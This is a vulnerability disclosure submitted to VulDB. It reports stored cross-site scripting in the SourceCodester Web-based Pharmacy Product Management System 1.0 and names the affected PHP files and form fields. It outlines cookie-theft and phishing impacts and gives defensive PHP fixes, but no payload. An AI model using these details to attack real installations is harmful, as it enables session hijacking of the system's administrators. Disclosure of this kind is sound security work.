Submit #555918: Sourcecodester Web-based Pharmacy Product Management System v1.0 Cross Site Scriptinginfo

TitleSourcecodester Web-based Pharmacy Product Management System v1.0 Cross Site Scripting
Description# Cybersecurity Analysis Report: XSS Vulnerability in Web-based Pharmacy Product Management System ## Vulnerability Overview Multiple stored Cross-Site Scripting (XSS) vulnerabilities were identified in version 1.0 of the Web-based Pharmacy Product Management System, affecting several critical functional modules. ## Technical Analysis ### Vulnerability Details - **Vulnerability Type**: Stored Cross-Site Scripting (XSS) (CWE-79) - **Affected Files**: - `add-admin.php` - `changepassword.php` - `add-stock.php` - `add-product.php` - `add-category.php` - `add-supplier.php` ### Root Cause The system fails to properly filter and escape user inputs, directly echoing POST parameters back to HTML pages, allowing malicious scripts to be stored and executed. ### Attack Vectors Attackers can exploit this vulnerability by: 1. Injecting malicious JavaScript code into form fields 2. Having the malicious scripts execute in the browsers of administrators or other users when they view affected pages ## Impact Assessment - **Severity**: High - **Potential Impact**: - Session hijacking (via cookie theft) - Phishing attacks (by modifying page content) - Application interface defacement - Potential privilege escalation ## Remediation Recommendations ### Immediate Fixes 1. **Input Validation**: ```php // Example: Email validation if (!filter_var($_POST['txtemail'], FILTER_VALIDATE_EMAIL)) { die("Invalid email format"); } ``` 2. **Output Encoding**: ```php // Encode all user data output to HTML $safe_email = htmlspecialchars($_POST['txtemail'], ENT_QUOTES, 'UTF-8'); ``` 3. **Content Security Policy (CSP)**: ```php header("Content-Security-Policy: default-src 'self'; script-src 'self'"); ``` ### Long-term Security Hardening 1. Implement comprehensive Security Development Lifecycle (SDL) 2. Introduce automated security testing tools 3. Conduct regular security code audits ## Best Practice Recommendations 1. Implement "whitelist" validation for all user inputs 2. Use prepared statements to prevent SQL injection 3. Apply the principle of least privilege 4. Regularly update dependencies and frameworks ## Conclusion This vulnerability poses serious security risks to the system. Immediate remediation following the above recommendations is advised. Additionally, a comprehensive security audit of the entire system is recommended to identify and address other potential vulnerabilities. For further technical support or detailed remediation plans, please contact the cybersecurity team at any time.
Source⚠️ https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/xss_from_input_with_post.md
User
 lingze (UID 83608)
Submission04/10/2025 15:32 (1 Year ago)
Moderation04/19/2025 16:16 (9 days later)
StatusAccepted
VulDB entry305728 [SourceCodester Web-based Pharmacy Product Management System 1.0 add-admin.php txtpassword/txtfullname/txtemail cross site scripting]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!